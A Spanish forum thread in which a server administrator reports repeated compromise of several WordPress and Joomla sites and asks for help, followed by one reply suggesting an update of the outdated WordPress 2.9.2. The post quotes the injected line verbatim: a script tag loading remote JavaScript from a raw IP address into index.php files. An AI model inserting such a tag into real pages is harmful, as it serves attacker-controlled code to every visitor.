Mi WP está hackeado?

Hola, controlo un servidor dedicado en el cual tengo unas 70 páginas web alojadas de estas una vez 3 fueron "hackeadas" y a la segunda una web de esas 3 otra vez padeció el hack.

El hack en las 3 webs es el mismo y de estas 2 son WP y otra es Joomla.

Actualmente la web fue hackeada otra vez y está en WP, el hack consite en que en el index.php de la home y en el index.php del wp-admin queda inyectado al principio del fichero el siguiente script:
<script type="text/javascript" src="http://213.175.200.227/js.php"></script>
quitándolo se soluciona el problema, pero claro me va a volver a pasar.

Es un problema de seguridad del servidor o de los CMSs ?

La versión del WP hackeado es 2.9.2

<meta name="generator" content="WordPress 2.9.2" />

Creo que las contraseñas son correctas en lo referente a FTP, pero no me cabe duda de que en el servidor dedicado haya contraseñas a otras webs que sean accesibles...

Podéis comentarme algo al respecto? algo de ayuda por favor porque no sé como solucionarlo.

Aviso que soy espabilado y un empujón en la dirección correcta... yo me lo curro!

Muchas gracias por responder de antelación!

Tal vez, sea la versión de wordpress, ya que es vieja, deberías actualizarlas para mejorar las seguridad.
Puede ser también el servidor, si no te ofrecen seguridad o directamente no tiene buena seguridad, puede ser el servidor..
La verdad de wordpress, las versiones anteriores a 3.0, no tengo mucha idea, ya que no las utilice, porque cuando yo empece con aprender a hacer webs y demás, ya estaba la 3.0
Saludos.